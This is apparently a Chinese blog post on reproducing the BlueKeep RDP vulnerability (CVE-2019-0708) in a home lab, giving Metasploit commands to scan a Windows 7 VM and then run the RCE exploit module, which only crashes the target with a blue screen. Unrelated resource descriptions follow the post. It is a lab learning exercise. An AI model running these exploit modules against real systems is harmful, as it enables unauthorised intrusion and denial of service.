CVE-2019-0708复刻

一、CVE-2019-0708漏洞介绍

CVE-2019-0708(又称BlueKeep)是Windows远程桌面服务(RDP)中的一个远程代码执行漏洞,属于严重的“蠕虫级”漏洞。其成因是RDP协议在处理连接请求时存在内存 corruption 问题,攻击者无需认证即可通过3389端口发送特制数据包,远程控制目标系统。该漏洞因可能被蠕虫利用快速传播而受到高度关注,微软已发布紧急补丁修复。

二、漏洞影响版本

影响版本主要包括:

  • Windows 7 (包括SP1)
  • Windows Server 2008 (包括R2)
  • Windows XP 和 Windows Server 2003(微软已停止支持的旧版本系统)

三、漏洞复刻

3.1 环境准备

靶机ip地址
win7192.168.3.180
kali192.168.3.211

二者在我的环境都是桥接;两者是可以ping通的

在这里插入图片描述
在win7里面要操作下

  1. 关闭win7防火墙

在这里插入图片描述

  1. 开启允许远程访问

在这里插入图片描述

3.2 攻击过程

1、开启kali的msf

msfconsole

在这里插入图片描述
2、搜索0708模块

search 0708

在这里插入图片描述
这上面0为探测模块,3为攻击模块
注意:
探测模块:auxiliary/scanner/ 开头,用于检测漏洞是否存在,无实际攻击行为。
利用模块:exploit/ 开头,用于对漏洞进行实际攻击测试(如远程代码执行)。

每一行代表一个模块或其子选项(如攻击目标、操作类型),包含模块名称、披露日期、风险等级、检测方法和描述等信息。主要的模块解析如下:
auxiliary/scanner/rdp/cve_2019_0708_bluekeep

  • 这是一个扫描模块,用于检测目标是否存在 CVE-2019-0708(BlueKeep)漏洞。 该漏洞是 Windows
  • 远程桌面服务(RDP)的严重远程代码执行漏洞,影响 Windows 7、Server 2008 等系统。
  • 包含两个子操作: Crash:触发漏洞导致目标系统崩溃(拒绝服务测试)。 Scan:扫描目标是否存在可利用的该漏洞。
    exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  • 这是一个漏洞利用模块,用于对存在 CVE-2019-0708 漏洞的目标执行远程代码(RCE)。
  • 包含多个子目标(target),针对不同环境(如不同虚拟化平台、Windows 版本)的系统,需要根据目标实际情况选择。

其他模块

  • exploit/windows/browser/clear_quest_cqole:针对 IBM Rational ClearQuest
    软件的远程代码执行漏洞(CVE 未明确标注,披露于 2012 年)。
  • exploit/windows/browser/tumbleweed_filetransfer:针对 Tumbleweed
    FileTransfer 软件的 ActiveX 控件缓冲区溢出漏洞(披露于 2008 年),主要影响旧版本 Windows 系统(如XP、2000)。

3、做个尝试
先用模块0做个探测,用于检测是否有漏洞

use 0
show options
set rhost 192.168.3.180
run

得到
在这里插入图片描述
show options:查看该模块需要配置的参数,结果显示:

  • 必填参数:RDP_CLIENT_IP(本地客户端 IP,默认已设置为192.168.0.100)、RHOSTS(目标主机 IP 或 IP
    段)、RPORT(目标端口,默认 3389,即 RDP 服务端口)、THREADS(并发线程数,默认 1)。
  • 可选参数:RDP_CLIENT_NAME(客户端名称)、RDP_DOMAIN(域名)、RDP_USER(用户名),这些用于模拟客户端身份,不填则使用默认或随机值。
  • 当前操作模式:Scan(扫描可利用的目标),这是该模块的默认动作。

看这,这下面是扫描的结果
在这里插入图片描述

  • [+] 192.168.3.180:3389 - The target is vulnerable. The target
    attempted cleanup of the incorrectly-bound MS_T120 channel.

    这是核心结果:目标主机192.168.3.180的 3389 端口(RDP 服务)存在
    CVE-2019-0708(BlueKeep)漏洞。
    原理说明:BlueKeep 漏洞的本质是 RDP协议中MS_T120通道的内存错误,扫描模块通过模拟特定请求,发现目标对错误绑定的MS_T120通道进行了清理操作,这是漏洞存在的特征。
  • [*]192.168.3.180:3389 - Scanned 1 of 1 hosts (100%
    complete):扫描完成,共扫描 1 台主机,全部完成。
  • [*] Auxiliary module execution completed:探测模块执行结束。

4、攻击开始
探测完了,有漏洞了,该利用了

use 3
show options
set rhosts 192.168.3.180
show targets
set target 5
run

kali的结果:
在这里插入图片描述
旁边放着的win7虚拟机:
在这里插入图片描述
过程中可以看到,正常的桌面屏幕一下变成蓝色,并刷刷刷报出上面的错误

5、拿目标机shell
对方win7蓝屏后,等待一段时间,会自动重启(不太建议着急地自己重启VM_win7),等的时间…耐心等待(有佬有其他方案欢迎评论区交流)

在这里插入图片描述

在kali中,退出msfconsole,并重新操作:

这里注意win7好像会换IP地址

msfconsole
search 0708
use 3
set rhosts 192.168.3.187
show targets
set target 5
run

但这得到的还是蓝屏。我后续又固定了win7的IP地址,操作如下
在这里插入图片描述
但依然是蓝屏,没有反弹shell。有没有大佬教教

内容概要:该PPT详细介绍了企业架构设计的方法论,涵盖业务架构、数据架构、应用架构和技术架构四大核心模块。首先分析了企业架构现状,包括业务、数据、应用和技术四大架构的内容和关系,明确了企业架构设计的重要性。接着,阐述了新版企业架构总体框架(CSG-EAF 2.0)的形成过程,强调其融合了传统架构设计(TOGAF)和领域驱动设计(DDD)的优势,以适应数字化转型需求。业务架构部分通过梳理企业级和专业级价值流,细化业务能力、流程和对象,确保业务战略的有效落地。数据架构部分则遵循五大原则,确保数据的准确、一致和高效使用。应用架构方面,提出了分层解耦和服务化的设计原则,以提高灵活性和响应速度。最后,技术架构部分围绕技术框架、组件、平台和部署节点进行了详细设计,确保技术架构的稳定性和扩展性。 适合人群:适用于具有一定企业架构设计经验的IT架构师、项目经理和业务分析师,特别是那些希望深入了解如何将企业架构设计与数字化转型相结合的专业人士。 使用场景及目标:①帮助企业和组织梳理业务流程,优化业务能力,实现战略目标;②指导数据管理和应用开发,确保数据的一致性和应用的高效性;③为技术选型和系统部署提供科学依据,确保技术架构的稳定性和扩展性。 阅读建议:此资源内容详尽,涵盖企业架构设计的各个方面。建议读者在学习过程中,结合实际案例进行理解和实践,重点关注各架构模块之间的关联和协同,以便更好地应用于实际工作中。
资 源 简 介 独立分量分析(Independent Component Analysis,简称ICA)是近二十年来逐渐发展起来的一种盲信号分离方法。它是一种统计方法,其目的是从由传感器收集到的混合信号中分离相互独立的源信号,使得这些分离出来的源信号之间尽可能独立。它在语音识别、电信和医学信号处理等信号处理方面有着广泛的应用,目前已成为盲信号处理,人工神经网络等研究领域中的一个研究热点。本文简要的阐述了ICA的发展、应用和现状,详细地论述了ICA的原理及实现过程,系统地介绍了目前几种主要ICA算法以及它们之间的内在联系, 详 情 说 明 独立分量分析(Independent Component Analysis,简称ICA)是近二十年来逐渐发展起来的一种盲信号分离方法。它是一种统计方法,其目的是从由传感器收集到的混合信号中分离相互独立的源信号,使得这些分离出来的源信号之间尽可能独立。它在语音识别、电信和医学信号处理等信号处理方面有着广泛的应用,目前已成为盲信号处理,人工神经网络等研究领域中的一个研究热点。 本文简要的阐述了ICA的发展、应用和现状,详细地论述了ICA的原理及实现过程,系统地介绍了目前几种主要ICA算法以及它们之间的内在联系,在此基础上重点分析了一种快速ICA实现算法一FastICA。物质的非线性荧光谱信号可以看成是由多个相互独立的源信号组合成的混合信号,而这些独立的源信号可以看成是光谱的特征信号。为了更好的了解光谱信号的特征,本文利用独立分量分析的思想和方法,提出了利用FastICA算法提取光谱信号的特征的方案,并进行了详细的仿真实验。 此外,我们还进行了进一步的研究,探索了其他可能的ICA应用领域,如音乐信号处理、图像处理以及金融数据分析等。通过在这些领域中的实验和应用,我们发现ICA在提取信号特征、降噪和信号分离等方面具有广泛的潜力和应用前景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值